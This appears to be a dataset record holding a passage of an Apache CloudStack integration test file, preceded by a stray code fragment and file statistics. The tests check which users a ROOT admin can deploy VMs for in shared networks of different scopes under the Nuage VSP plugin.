account_update_post_params = _account_post_params()
company_params = [
    company_params_in_header,
]
| 30.095745
| 85
| 0.698834
| 329
| 2,829
| 5.705167
| 0.100304
| 0.179009
| 0.179009
| 0.257326
| 0.961108
| 0.946723
| 0.92488
| 0.816196
| 0.816196
| 0.816196
| 0
| 0
| 0.195475
| 2,829
| 93
| 86
| 30.419355
| 0.824692
| 0
| 0
| 0.831325
| 0
| 0
| 0.081654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012048
| 0
| 0.012048
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dca034e25082beddd122db12f2bb62b4a914089f
| 120,763
|
py
|
Python
|
test/integration/plugins/nuagevsp/test_nuage_publicsharednetwork.py
|
serbaut/cloudstack
|
9513053f4256375e892df27d0c26644d1fe41725
|
[
"Apache-2.0"
] | 14
|
2015-01-12T13:46:12.000Z
|
2021-07-19T19:33:28.000Z
|
test/integration/plugins/nuagevsp/test_nuage_publicsharednetwork.py
|
serbaut/cloudstack
|
9513053f4256375e892df27d0c26644d1fe41725
|
[
"Apache-2.0"
] | 8
|
2020-11-16T17:21:07.000Z
|
2022-02-01T01:06:07.000Z
|
test/integration/plugins/nuagevsp/test_nuage_publicsharednetwork.py
|
serbaut/cloudstack
|
9513053f4256375e892df27d0c26644d1fe41725
|
[
"Apache-2.0"
] | 8
|
2015-07-17T12:36:51.000Z
|
2018-08-09T16:23:40.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Component tests for Shared Network functionality with Nuage VSP SDN plugin:
Public Shared Network
"""
# Import Local Modules
from nuageTestCase import nuageTestCase
from marvin.lib.utils import cleanup_resources
from marvin.lib.base import (Account,
Domain,
User,
VirtualMachine,
Network,
NetworkOffering)
from marvin.cloudstackException import CloudstackAclException
# Import System modules
from nose.plugins.attrib import attr
import random
import string
class TestNuagePublicSharedNetwork(nuageTestCase):
"""Test Shared Network functionality with Nuage VSP SDN plugin:
Public Shared Network
"""
@classmethod
def setUpClass(cls):
"""
Create the following domain tree and accounts that are required for
executing Nuage VSP SDN plugin test cases for shared networks:
Under ROOT - create domain D1
Under domain D1 - Create two subdomains D11 and D12
Under each of the domains - create one admin user and couple of
regular users.
Create shared network with the following scope:
1. Network with scope="all"
2. Network with scope="domain" with no subdomain access
3. Network with scope="domain" with subdomain access
4. Network with scope="account"
"""
super(TestNuagePublicSharedNetwork, cls).setUpClass()
cls.sharednetworkdata = cls.test_data["acl"]
cls.nuagenetworkdata = cls.test_data["nuagevsp"]
cls.domain_1 = None
cls.domain_2 = None
try:
# backup default apikey and secretkey
cls.default_apikey = cls.api_client.connection.apiKey
cls.default_secretkey = cls.api_client.connection.securityKey
# Create domains
cls.domain_1 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain1"]
)
cls.domain_11 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain11"],
parentdomainid=cls.domain_1.id
)
cls.domain_111 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain111"],
parentdomainid=cls.domain_11.id,
)
cls.domain_12 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain12"],
parentdomainid=cls.domain_1.id
)
cls.domain_2 = Domain.create(
cls.api_client,
cls.sharednetworkdata["domain2"]
)
# Create 1 admin account and 2 user accounts for doamin_1
cls.account_d1 = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD1"],
admin=True,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d1)
cls.user_d1_apikey = user.apikey
cls.user_d1_secretkey = user.secretkey
cls.account_d1a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD1A"],
admin=False,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d1a)
cls.user_d1a_apikey = user.apikey
cls.user_d1a_secretkey = user.secretkey
cls.account_d1b = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD1B"],
admin=False,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d1b)
cls.user_d1b_apikey = user.apikey
cls.user_d1b_secretkey = user.secretkey
# Create 1 admin and 2 user accounts for doamin_11
cls.account_d11 = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD11"],
admin=True,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d11)
cls.user_d11_apikey = user.apikey
cls.user_d11_secretkey = user.secretkey
cls.account_d11a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD11A"],
admin=False,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d11a)
cls.user_d11a_apikey = user.apikey
cls.user_d11a_secretkey = user.secretkey
cls.account_d11b = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD11B"],
admin=False,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d11b)
cls.user_d11b_apikey = user.apikey
cls.user_d11b_secretkey = user.secretkey
# Create 2 user accounts and 1 admin account for doamin_111
cls.account_d111 = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD111"],
admin=True,
domainid=cls.domain_111.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d111)
cls.user_d111_apikey = user.apikey
cls.user_d111_secretkey = user.secretkey
cls.account_d111a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD111A"],
admin=False,
domainid=cls.domain_111.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d111a)
cls.user_d111a_apikey = user.apikey
cls.user_d111a_secretkey = user.secretkey
cls.account_d111b = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD111B"],
admin=False,
domainid=cls.domain_111.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d111b)
cls.user_d111b_apikey = user.apikey
cls.user_d111b_secretkey = user.secretkey
# Create 2 user accounts for doamin_12
cls.account_d12a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD12A"],
admin=False,
domainid=cls.domain_12.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d12a)
cls.user_d12a_apikey = user.apikey
cls.user_d12a_secretkey = user.secretkey
cls.account_d12b = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD12B"],
admin=False,
domainid=cls.domain_12.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d12b)
cls.user_d12b_apikey = user.apikey
cls.user_d12b_secretkey = user.secretkey
# Create 1 user account for domain_2
cls.account_d2a = Account.create(
cls.api_client,
cls.sharednetworkdata["accountD2"],
admin=False,
domainid=cls.domain_2.id
)
user = cls.generateKeysForUser(cls.api_client, cls.account_d2a)
cls.user_d2a_apikey = user.apikey
cls.user_d2a_secretkey = user.secretkey
# Create 1 user account and admin account in "ROOT" domain
cls.account_roota = Account.create(
cls.api_client,
cls.sharednetworkdata["accountROOTA"],
admin=False,
)
user = cls.generateKeysForUser(cls.api_client, cls.account_roota)
cls.user_roota_apikey = user.apikey
cls.user_roota_secretkey = user.secretkey
cls.account_root = Account.create(
cls.api_client,
cls.sharednetworkdata["accountROOTA"],
admin=True,
)
user = cls.generateKeysForUser(cls.api_client, cls.account_root)
cls.user_root_apikey = user.apikey
cls.user_root_secretkey = user.secretkey
# service offering is already created in Nuagetestcase
cls.sharednetworkdata['mode'] = cls.zone.networktype
# As admin user , create shared network with scope "all",
# "domain" with subdomain access,
# "domain" without subdomain access and "account"
cls.api_client.connection.apiKey = cls.default_apikey
cls.api_client.connection.securityKey = cls.default_secretkey
cls.test_data["nuagevsp"]["shared_nuage_public_network_offering"][
"serviceProviderList"].update({"UserData": 'VirtualRouter'})
cls.test_data["nuagevsp"]["shared_nuage_public_network_offering"][
"supportedservices"] = 'Dhcp,Connectivity,UserData'
cls.shared_network_offering = NetworkOffering.create(
cls.api_client,
cls.test_data["nuagevsp"][
"shared_nuage_public_network_offering"],
conservemode=False
)
# Enable Network offering
cls.shared_network_offering.update(cls.api_client, state='Enabled')
cls.shared_network_offering_id = cls.shared_network_offering.id
cls.shared_network_all = Network.create(
cls.api_client,
cls.test_data["nuagevsp"]["network_all"],
networkofferingid=cls.shared_network_offering_id,
zoneid=cls.zone.id
)
cls.shared_network_domain_d11 = Network.create(
cls.api_client,
cls.test_data["nuagevsp"][
"network_domain_with_no_subdomain_access"],
networkofferingid=cls.shared_network_offering_id,
zoneid=cls.zone.id,
domainid=cls.domain_11.id,
subdomainaccess=False
)
cls.shared_network_domain_with_subdomain_d11 = Network.create(
cls.api_client,
cls.test_data["nuagevsp"][
"network_domain_with_subdomain_access"],
networkofferingid=cls.shared_network_offering_id,
zoneid=cls.zone.id,
domainid=cls.domain_11.id,
subdomainaccess=True
)
cls.shared_network_account_d111a = Network.create(
cls.api_client,
cls.test_data["nuagevsp"]["network_account"],
networkofferingid=cls.shared_network_offering_id,
zoneid=cls.zone.id,
domainid=cls.domain_111.id,
accountid=cls.account_d111a.user[0].username
)
cls.vmdata = {"name": "test",
"displayname": "test"
}
cls._cleanup = [
cls.account_root,
cls.account_roota,
cls.shared_network_all,
cls.shared_network_offering,
cls.service_offering,
]
user_data = ''.join(random.choice(
string.ascii_uppercase + string.digits) for x in range(2500))
cls.vmdata["userdata"] = user_data
except Exception as e:
cls.domain_1.delete(cls.api_client, cleanup="true")
cls.domain_2.delete(cls.api_client, cleanup="true")
cleanup_resources(cls.api_client, cls._cleanup)
raise Exception(
"Failed to create the setup required to execute the test "
"cases: %s" % e)
return
@classmethod
def tearDownClass(cls):
cls.api_client.connection.apiKey = cls.default_apikey
cls.api_client.connection.securityKey = cls.default_secretkey
cls.domain_1.delete(cls.api_client, cleanup="true")
cls.domain_2.delete(cls.api_client, cleanup="true")
cleanup_resources(cls.api_client, cls._cleanup)
return
def setUp(self):
self.api_client = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
def tearDown(self):
# restore back default apikey and secretkey
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
return
# Test cases relating to deploying Virtual Machine as ROOT admin for other
# users in shared network with scope=all
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_scope_all_domainuser(self):
        """Validate that ROOT admin is able to deploy a VM for other users in
        a shared network with scope=all
        """
        # Deploy VM for a user in a domain under ROOT as admin
        # (switch the connection back to the ROOT admin credentials first)
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD1A"]["name"] + \
            "-shared-scope-all-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD1A"]["displayname"] + \
            "-shared-scope-all-root-admin"
        vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
                            account=self.account_d1a, cleanup=False)
        # VM must be running and owned by the target user's account/domain
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d1a.name and
            vm.domainid == self.account_d1a.domainid,
            True,
            "ROOT admin is not able to deploy a VM for other users in a "
            "shared network with scope=all")
        # NOTE(review): unlike the sibling tests, this one skips
        # verify_vsd_shared_network -- confirm that is intentional.
        subnet_id = self.get_subnet_id(self.shared_network_all.id,
                                       self.nuagenetworkdata["network_all"][
                                           "gateway"])
        self.verify_vsd_enterprise_vm(self.account_d1a.domainid,
                                      self.shared_network_all, vm,
                                      sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_scope_all_domainadminuser(
            self):
        """Validate that ROOT admin is able to deploy a VM for a domain admin
        users in a shared network with scope=all
        """
        # Deploy VM for an admin user in a domain under ROOT as admin
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD1"]["name"] + \
            "-shared-scope-all-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD1"]["displayname"] + \
            "-shared-scope-all-root-admin"
        vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
                            account=self.account_d1, cleanup=False)
        # VM must be running and owned by the domain admin's account/domain
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d1.name and
            vm.domainid == self.account_d1.domainid,
            True,
            "ROOT admin is not able to deploy a VM "
            "for a domain admin users in a shared network with scope=all")
        # Cross-check the network and VM against the Nuage VSD side
        self.verify_vsd_shared_network(
            self.account_d1.domainid,
            self.shared_network_all,
            gateway=self.nuagenetworkdata["network_all"]["gateway"])
        subnet_id = self.get_subnet_id(self.shared_network_all.id,
                                       self.nuagenetworkdata["network_all"][
                                           "gateway"])
        self.verify_vsd_enterprise_vm(self.account_d1.domainid,
                                      self.shared_network_all, vm,
                                      sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_scope_all_subdomainuser(self):
        """Validate that ROOT admin is able to deploy a VM for any user in a
        subdomain in a shared network with scope=all
        """
        # Deploy VM as user in a subdomain under ROOT
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD11A"]["name"] + \
            "-shared-scope-all-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD11A"]["displayname"] + \
            "-shared-scope-all-root-admin"
        vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
                            account=self.account_d11a, cleanup=False)
        # VM must be running and owned by the subdomain user's account/domain
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d11a.name and
            vm.domainid == self.account_d11a.domainid,
            True,
            "ROOT admin is not able to deploy a VM"
            " for any user in a subdomain in a shared network with scope=all")
        # Cross-check the network and VM against the Nuage VSD side
        self.verify_vsd_shared_network(
            self.account_d11a.domainid,
            self.shared_network_all,
            gateway=self.nuagenetworkdata["network_all"]["gateway"])
        subnet_id = self.get_subnet_id(self.shared_network_all.id,
                                       self.nuagenetworkdata["network_all"][
                                           "gateway"])
        self.verify_vsd_enterprise_vm(self.account_d11a.domainid,
                                      self.shared_network_all, vm,
                                      sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_scope_all_subdomainadminuser(
            self):
        """Validate that ROOT admin is able to deploy a VM for admin user in a
        domain in a shared network with scope=all
        """
        # Deploy VM as an admin user in a subdomain under ROOT
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD11"]["name"] + \
            "-shared-scope-all-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD11"]["displayname"] + \
            "-shared-scope-all-root-admin"
        vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
                            account=self.account_d11, cleanup=False)
        # VM must be running and owned by the subdomain admin's account/domain
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d11.name and
            vm.domainid == self.account_d11.domainid,
            True,
            "ROOT admin is not able to deploy a VM for admin user in a domain "
            "in a shared network with scope=all")
        # Cross-check the network and VM against the Nuage VSD side
        self.verify_vsd_shared_network(
            self.account_d11.domainid,
            self.shared_network_all,
            gateway=self.nuagenetworkdata["network_all"]["gateway"])
        subnet_id = self.get_subnet_id(self.shared_network_all.id,
                                       self.nuagenetworkdata["network_all"][
                                           "gateway"])
        self.verify_vsd_enterprise_vm(self.account_d11.domainid,
                                      self.shared_network_all, vm,
                                      sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_scope_all_ROOTuser(self):
        """Validate that ROOT admin is able to deploy a VM for user in ROOT
        domain in a shared network with scope=all
        """
        # Deploy VM as user in ROOT domain
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmROOTA"]["name"] + \
            "-shared-scope-all-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmROOTA"]["displayname"] + \
            "-shared-scope-all-root-admin"
        vm = self.create_VM(self.shared_network_all, testdata=self.vmdata,
                            account=self.account_roota, cleanup=False)
        # VM must be running and owned by the ROOT-domain user's account/domain
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_roota.name and
            vm.domainid == self.account_roota.domainid,
            True,
            "ROOT admin is not able to deploy a VM for user in ROOT domain "
            "in a shared network with scope=all")
        # Cross-check the network and VM against the Nuage VSD side
        self.verify_vsd_shared_network(
            self.account_roota.domainid,
            self.shared_network_all,
            gateway=self.nuagenetworkdata["network_all"]["gateway"])
        subnet_id = self.get_subnet_id(self.shared_network_all.id,
                                       self.nuagenetworkdata["network_all"][
                                           "gateway"])
        self.verify_vsd_enterprise_vm(self.account_roota.domainid,
                                      self.shared_network_all, vm,
                                      sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
# Test cases relating to deploying Virtual Machine as ROOT admin for other
# users in shared network with scope=Domain and no subdomain access
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_domainuser(
            self):
        """Validate that ROOT admin is able to deploy a VM for domain user in a
        shared network with scope=domain with no subdomain access
        """
        # Deploy VM as user in a domain that has shared network with no
        # subdomain access
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD11A"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD11A"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        vm = self.create_VM(self.shared_network_domain_d11,
                            testdata=self.vmdata, account=self.account_d11a,
                            cleanup=False)
        # VM must be running and owned by the domain user's account/domain
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d11a.name and
            vm.domainid == self.account_d11a.domainid,
            True,
            "ROOT admin is not able to deploy a VM for domain user in a "
            "shared network with scope=domain with no subdomain access")
        # Cross-check the network and VM against the Nuage VSD side
        self.verify_vsd_shared_network(
            self.account_d11a.domainid,
            self.shared_network_domain_d11,
            gateway=self.nuagenetworkdata[
                "network_domain_with_no_subdomain_access"]["gateway"])
        subnet_id = self.get_subnet_id(
            self.shared_network_domain_d11.id,
            self.nuagenetworkdata[
                "network_domain_with_no_subdomain_access"]["gateway"])
        self.verify_vsd_enterprise_vm(self.account_d11a.domainid,
                                      self.shared_network_domain_d11, vm,
                                      sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_domainadminuser(
            self):
        """Validate that ROOT admin is able to deploy a VM for domain admin
        user in a shared network with scope=domain with no subdomain access
        """
        # Deploy VM as an admin user in a domain that has shared network with
        # no subdomain access
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD11"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD11"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        vm = self.create_VM(self.shared_network_domain_d11,
                            testdata=self.vmdata, account=self.account_d11,
                            cleanup=False)
        # VM must be running and owned by the domain admin's account/domain
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d11.name and
            vm.domainid == self.account_d11.domainid,
            True,
            "ROOT admin is not able to deploy VM for domain admin user in "
            "shared network with scope=domain with no subdomain access")
        # Cross-check the network and VM against the Nuage VSD side
        self.verify_vsd_shared_network(
            self.account_d11.domainid,
            self.shared_network_domain_d11,
            gateway=self.nuagenetworkdata[
                "network_domain_with_no_subdomain_access"]["gateway"])
        subnet_id = self.get_subnet_id(
            self.shared_network_domain_d11.id,
            self.nuagenetworkdata[
                "network_domain_with_no_subdomain_access"]["gateway"])
        self.verify_vsd_enterprise_vm(self.account_d11.domainid,
                                      self.shared_network_domain_d11, vm,
                                      sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_subdomainuser(
            self):
        """Validate that ROOT admin is NOT able to deploy a VM for sub domain
        user in a shared network with scope=domain with no subdomain access
        """
        # Deploy VM as user in a subdomain under a domain that has shared
        # network with no subdomain access
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD111A"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD111A"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        # Negative test: the deployment is expected to be rejected
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_d11.id,
                accountid=self.account_d111a.name,
                domainid=self.account_d111a.domainid
            )
            self.fail(
                "ROOT admin is able to deploy a VM for sub domain user in a "
                "shared network with scope=domain with no subdomain access")
        except Exception as e:
            self.debug(
                "When a user from a subdomain deploys a VM in a shared "
                "network with scope=domain with no subdomain access %s" % e)
            # The failure must be the expected ACL error, not some other fault
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when ROOT admin tries to "
                    "deploy a VM for sub domain user in a shared network with "
                    "scope=domain with no subdomain access ")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_subdomainadmin(
            self):
        """Validate that ROOT admin is NOT able to deploy a VM for sub domain
        admin user in a shared network with scope=domain with no subdomain
        access
        """
        # Deploy VM as an admin user in a subdomain under a domain that has
        # shared network with no subdomain access
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD111"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD111"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        # Negative test: the deployment is expected to be rejected
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_d11.id,
                accountid=self.account_d111.name,
                domainid=self.account_d111.domainid
            )
            self.fail(
                "ROOT admin is able to deploy VM for sub domain admin user in "
                "a shared network with scope=domain with no subdomain access")
        except Exception as e:
            self.debug(
                "When a admin user from a subdomain deploys a VM in a shared "
                "network with scope=domain with no subdomain access %s" % e)
            # The failure must be the expected ACL error, not some other fault
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when ROOT admin tries to "
                    "deploy a VM for sub domain admin user in a shared "
                    "network with scope=domain with no subdomain access")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_parentdomuser(
            self):
        """Validate that ROOT admin is NOT able to deploy a VM for parent
        domain user in a shared network with scope=domain with no subdomain
        access
        """
        # Deploy VM as user in parentdomain of a domain that has shared network
        # with no subdomain access
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD1A"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD1A"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        # Negative test: the deployment is expected to be rejected
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_d11.id,
                accountid=self.account_d1a.name,
                domainid=self.account_d1a.domainid
            )
            self.fail(
                " ROOT admin is able to deploy a VM for parent domain user in "
                "a shared network with scope=domain with no subdomain access")
        except Exception as e:
            self.debug(
                "When a user from parent domain deploys a VM in a shared "
                "network with scope=domain with no subdomain access %s" % e)
            # The failure must be the expected ACL error, not some other fault
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when ROOT admin tries "
                    "to deploy a VM for parent domain user in a shared "
                    "network with scope=domain with no subdomain access")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_parentdomadmin(
            self):
        """Validate that ROOT admin is NOT able to deploy a VM for parent
        domain admin user in a shared network with scope=domain with no
        subdomain access
        """
        # Deploy VM as an admin user in parentdomain of a domain that has
        # shared network with no subdomain access
        self.api_client.connection.apiKey = self.default_apikey
        self.api_client.connection.securityKey = self.default_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD1"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD1"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-root-admin"
        # Negative test: the deployment is expected to be rejected
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_d11.id,
                accountid=self.account_d1.name,
                domainid=self.account_d1.domainid
            )
            self.fail(
                "ROOT admin is able to deploy a VM for parent domain admin "
                "user in a shared network with scope=domain with no subdomain "
                "access")
        except Exception as e:
            self.debug(
                "When an admin user from parent domain deploys a VM in a "
                "shared network with scope=domain with no subdomain access %s"
                % e)
            # The failure must be the expected ACL error, not some other fault
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when ROOT admin tries to "
                    "deploy a VM for parent domain admin user in a shared "
                    "network with scope=domain with no subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_nosubdomaccess_ROOTuser(self):
"""Validate that ROOT admin is NOT able to deploy a VM for parent
domain admin user in a shared network with scope=domain with no
subdomain access
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-root-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"ROOT admin is able to deploy a VM for parent domain admin "
"user in a shared network with scope=domain with no subdomain "
"access")
except Exception as e:
self.debug(
"When a regular user from ROOT domain deploys a VM in a "
"shared network with scope=domain with no subdomain access %s"
% e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when ROOT admin tries to "
"deploy a VM for parent domain admin user in a shared "
"network with scope=domain with no subdomain access")
# Test cases relating to deploying Virtual Machine as ROOT admin for other
# users in shared network with scope=Domain and with subdomain access
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_admin_subdomaccess_domainuser(
self):
"""Validate that ROOT admin is able to deploy a VM for domain user in a
shared network with scope=domain with subdomain access
"""
# Deploy VM as user in a domain that has shared network with subdomain
# access
self.api_client.connection.apiKey = self.default_apikey
self.api_client.connection.securityKey = self.default_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-root-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d11a,
cleanup=False)
self.assertEqual(
